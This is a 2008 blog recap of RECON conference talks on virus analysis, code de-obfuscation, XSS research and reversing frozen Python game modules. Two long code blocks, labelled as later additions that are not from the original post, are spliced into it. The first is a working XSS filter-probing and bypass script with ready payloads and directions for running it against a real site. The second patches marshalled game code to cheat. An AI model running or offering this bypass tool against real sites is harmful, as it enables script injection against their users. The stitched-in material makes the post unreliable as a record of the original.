RECON 08 Day 2
There was an open slot after lunch today which was filled by Nicolas Brulez. Hugo essentially threw Nicolas under the bus on this one, asking him to pull together an interesting last-minute talk ... naturally Nicolas pulled it off just fine. He walked the crowd through the dissection of an armored and polymorphic real-world virus sample. One of the more interesting aspects of the sample is that it was capable of crashing VMware version 5 from within the VM.
Eric Laspe walked through a series of screenshots and function descriptions of an IDA code de-obfuscator plugin. The plugin scans the current database looking for common code obfuscation patterns and uses emulation to simplify the code and control flow. Eric demonstrated the benefits of the tool with before-and-after call graphs of the RustockB virus. Most unfortunately, it does not look like the plugin will be released, either commercially or freely. I must say that is quite frustrating if this is the case. If you insist on spending an hour discussing a tool that will never see the light of day, then at least focus the talk on the underlying theories and algorithms instead of teasing the crowd with unusable visuals.
Alexander Sotirov is a thorough researcher and an excellent presenter; he spoke on black-box reverse engineering of cross-site scripting vulnerabilities in web applications. Alex made some points at the start of his talk that resonate strongly with what I've been feeling for some time now: that the future of security auditing is in the web. He presented some techniques for blindly identifying and abusing filter rules and will be releasing a script he wrote to help automate the process. Alex discovered a pretty critical XSS vulnerability which took Facebook two iterations and one month to fix. He also dropped an 0day which affects only Firefox < 2.0.0.2 users. The bugs are available at http://apps.facebook.com/zuckerbug.
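The black-box filter probing described above, as an added example that is not Alex's script and not code from the original post. The "target" is a constructed stand-in for a remote page that reflects a parameter through a naive blacklist; the prober treats it as an opaque function, exactly as it would a live HTTP endpoint, and infers the filter's rules from which probes survive, are stripped, are encoded, or come back altered. The bypass logic then checks candidate payloads against the same oracle.

```python
"""Black-box XSS filter fingerprinting and bypass discovery.

Added example; the target function, marker and probe lists are
constructed assumptions, not anything from the talk or the post.
"""
import html
import re

# Constructed target: a naive, non-recursive blacklist filter that
# reflects user input into a page. Stands in for a live endpoint.
def constructed_target(value: str) -> str:
    value = re.sub(r"<script", "", value, flags=re.IGNORECASE)
    value = value.replace("javascript:", "")
    value = value.replace("onerror", "")
    return f"<div>{value}</div>"

# Single characters whose survival reveals encoding/stripping rules,
# then tokens that reveal keyword blacklists, case handling and
# whether removal is applied once (nesting reassembles the token).
CHAR_PROBES = ["<", ">", '"', "'", "/", "=", " "]
TOKEN_PROBES = ["<script", "<SCRIPT", "<scr<scriptipt", "javascript:",
                "onerror", "onload", "<img", "<svg"]

def probe(target, payload: str, marker: str = "zzq"):
    """Reflect marker+payload+marker and return what lands between the markers."""
    page = target(f"{marker}{payload}{marker}")
    m = re.search(re.escape(marker) + r"(.*?)" + re.escape(marker), page, re.DOTALL)
    return m.group(1) if m else None

def fingerprint(target) -> dict:
    """Classify each probe as passes / stripped / encoded / altered:<result>."""
    results = {}
    for p in CHAR_PROBES + TOKEN_PROBES:
        got = probe(target, p)
        if got == p:
            results[p] = "passes"
        elif got == "":
            results[p] = "stripped"
        elif got == html.escape(p, quote=True):
            results[p] = "encoded"
        else:
            results[p] = f"altered:{got!r}"
    return results

def working_payloads(target) -> list:
    """Derive candidate payloads from the fingerprint and verify each one."""
    fp = fingerprint(target)
    candidates = []  # (payload sent, markup expected on the page)
    handlers = [h for h in ("onerror", "onload") if fp.get(h) == "passes"]
    tags = [t for t in ("<img", "<svg") if fp.get(t) == "passes"]
    for tag in tags:
        for h in handlers:
            p = f"{tag} {h}=alert(1)>"
            candidates.append((p, p))
    # A single-pass strip lets a nested token reassemble into the banned one.
    if fp.get("<scr<scriptipt") == "altered:'<script'":
        candidates.append(("<scr<scriptipt>alert(1)</script>",
                           "<script>alert(1)</script>"))
    return [sent for sent, expected in candidates
            if probe(target, sent) == expected]

if __name__ == "__main__":
    for k, v in fingerprint(constructed_target).items():
        print(f"{k!r:20} {v}")
    print(working_payloads(constructed_target))
```

Against a real site, replace constructed_target with a function that submits the value in the reflected parameter and returns the response body; the marker keeps the comparison anchored to the single reflection point even when the parameter appears elsewhere on the page.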
Aaron and Ali closed the day out with their talk on reverse engineering dynamic languages, which focused on static and runtime techniques for manipulating "frozen" Python modules (.pyd files). This research project was essentially kicked off a few months ago when I started playing around with Disney's Pirates of the Caribbean MMORPG and immediately wanted to cheat. The bulk of the game is written in Python and served as an excellent case study. Aaron and Ali walked the crowd through various Python internals, tips and tricks. A GUI tool for decompiling and recompiling frozen Python modules, called AntiFreeze, was written in the process and will be released soon. The pair closed out their talk with hilarious screenshots, videos and a live demonstration of the various cheats in action. Check back on this site in a couple of days and we should have videos and screenshots posted.
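What "frozen" means at the byte level, as an added example that is not AntiFreeze and not code from the post: a frozen module is a code object serialized with marshal and embedded in the binary as a byte array. The block below freezes a constructed toy module the way CPython's freeze tool does, recovers the blob from its C-array form (the static extraction step), disassembles it, executes it into a fresh module, and finally rebuilds the code object with one constant swapped (the runtime-patch style cheat). The module source, names and C-array encoding are assumptions for illustration; note that marshal output is tied to the interpreter version that produced it.

```python
"""Freeze, extract, disassemble, thaw and patch a marshalled Python module.

Added example; MODULE_SOURCE and the helper names are constructed stand-ins
for the tables a real .pyd would carry. Requires Python 3.8+ (code.replace).
"""
import dis
import io
import marshal
import types

# Constructed stand-in for a game module that enforces a limit client-side.
MODULE_SOURCE = '''
MAX_SPEED = 10

def clamp_speed(requested):
    """Cap a movement request; a cheat wants to lift this."""
    return min(requested, MAX_SPEED)
'''

def freeze(source: str, name: str) -> bytes:
    """Compile source and marshal the code object, as Tools/freeze does."""
    code = compile(source, f"<frozen {name}>", "exec")
    return marshal.dumps(code)

def to_c_array(name: str, blob: bytes) -> str:
    """Render the blob as the C initializer a freeze step would emit."""
    body = ",".join(str(b) for b in blob)
    return f"unsigned char M_{name}[] = {{{body}}};"

def from_c_array(text: str) -> bytes:
    """Parse the initializer back into bytes (the static extraction step)."""
    start = text.index("{") + 1
    end = text.rindex("}")
    return bytes(int(tok) for tok in text[start:end].split(",") if tok.strip())

def disassemble(blob: bytes) -> str:
    """Unmarshal and return the bytecode listing as text."""
    out = io.StringIO()
    dis.dis(marshal.loads(blob), file=out)
    return out.getvalue()

def thaw(blob: bytes, name: str) -> types.ModuleType:
    """Unmarshal the code object and execute it into a fresh module."""
    mod = types.ModuleType(name)
    exec(marshal.loads(blob), mod.__dict__)
    return mod

def patch_constant(blob: bytes, old, new) -> bytes:
    """Rebuild the module code object with one top-level constant replaced."""
    code = marshal.loads(blob)
    consts = tuple(new if c == old else c for c in code.co_consts)
    return marshal.dumps(code.replace(co_consts=consts))

if __name__ == "__main__":
    blob = freeze(MODULE_SOURCE, "speed")
    recovered = from_c_array(to_c_array("speed", blob))
    print(disassemble(recovered))
    print("stock:", thaw(recovered, "speed").clamp_speed(50))
    cheated = patch_constant(recovered, 10, 1000)
    print("patched:", thaw(cheated, "speed").clamp_speed(50))
```

The same round trip is what a static tool performs on a real .pyd: locate the frozen table, pull each module's bytes, unmarshal, decompile or edit, re-marshal and write the array back; the runtime variant skips the file and swaps the code object in the live interpreter instead.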
Comments
-
Anonymous commented on 2008-06-18 @ 07:09
you guys always delay the release of any script/tools/presentation...its bad ;)
-
Stephen commented on 2008-06-19 @ 22:18
Do you have a URL for the presentation by Nicolas Brulez?
-
Stephen commented on 2008-06-19 @ 22:20
Never mind I found it here: http://recon.cx/2008/speakers.html#polymorph
Thanks.
-
Pedram Amini commented on 2008-06-23 @ 13:58
Anonymous: There is a reason for that ... we always intend to clean up code before release and inevitably get lazy in doing so ;-)
Links To This Post
-
REcon 2008 Review « …And you will know me by the trail of bits
linked on 2008-06-16 @ 23:03
